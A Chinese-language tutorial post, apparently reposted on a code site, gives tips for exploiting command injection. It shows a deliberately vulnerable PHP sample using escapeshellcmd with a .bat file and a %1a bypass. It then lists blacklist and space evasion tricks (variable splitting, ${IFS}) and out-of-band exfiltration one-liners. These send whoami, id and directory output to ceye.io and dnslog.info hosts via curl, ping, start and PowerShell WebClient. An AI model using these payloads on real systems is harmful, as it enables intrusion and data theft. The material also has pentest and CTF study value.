首页 > 代码库 > 命令执行的tip

命令执行的tip

先看一个例子:
本地测试环境:php 5.4.45 + win

<?php
    $command = ‘dir ‘.$_POST[‘dir‘];
    $escaped_command = escapeshellcmd($command);
    var_dump($escaped_command);
    file_put_contents(‘out.bat‘,$escaped_command);
    system(‘out.bat‘);
?>

技术分享

应该如何去绕过执行?

escapeshellcmd

http://php.net/manual/zh/function.escapeshellcmd.php

escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec() 或 system() 函数,或者 执行操作符 之前进行转义。

具体会转义哪些字符?

https://github.com/php/php-src/blob/PHP-5.4.45/ext/standard/exec.c

技术分享

这些都会用^来取消其意义。也就是没办法用& | 来执行其他命令,只能列目录。

有这样的一个tip:执行.bat文件的时候,利用%1a,可以绕过过滤执行命令。

技术分享

更多好玩的命令绕过

linux下面tip特别多,在实战或者ctf中遇到最多的几个。
1、黑名单绕过

执行ls命令:
a=l;b=s;$a$b

cat hello文件内容:
a=c;b=at;c=he;d=llo;$a$b ${c}${d}

技术分享

2、空格绕过

绕过空格
${IFS}

或者在读取文件的时候利用重定向符
<>

技术分享

最后就是别人fuzz的一个命令执行项目:
https://github.com/ewilded/shelling

3、无回显
无回显获取数据的需求还是挺大的,比如sql,xxe,xss等等,这个时候一般可以用dns/http通道来获取数据。

linux:

curl xxxx.ceye.io/`whoami`
ping -c 1 `whoami`.xxxx.ceye.io

技术分享

可以获取数据,当前权限是root

技术分享

但是有一个特别恼火的事情就是特殊字符或者是空格出现的话,这时候可以通过一些编码来,比如base64

curl http://xxxx.ceye.io/$(id|base64)

技术分享


windows:
windows下很头疼,用起来并没有linux那么方便好用,比如curl、wget等等。

http请求:
for /F %x in (‘whoami‘) do start http://xxx.ceye.io/%x

dns请求:
获取计算机名:for /F "delims=\" %i in (‘whoami‘) do ping -n 1 %i.xxx.dnslog.info
获取用户名:for /F "delims=\ tokens=2" %i in (‘whoami‘) do ping -n 1 %i.xxx.dnslog.info

powershell这么厉害,为啥不用它来base64一下数据。

for /F %x in (‘whoami‘) do powershell $a=[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(‘%x‘));$b=New-Object System.Net.WebClient;$b.DownloadString(‘http://xxx.ceye.io/‘+$a);

这样就也能获取到一个base64编码到命令结果啦~算是弥补一个小小的坑。

ps:这个是用powershell2.0写的,其他版本未测试。

但是如果没有powershell想要获取更多数据的话,还是比较麻烦的。

比如获取d:\所有文件,遇上空格也是会被截断。

for /F %x in (‘dir /b D:\‘) do start http://xxx.ceye.io/%x

4、借他人之手来获取字符
如果过滤了<>?,可以从已有的文件中获取自己需要的字符。

技术分享

=。=,当然如果服务器能外网的话,直接wget -o /tmp 就好了。

命令执行的tip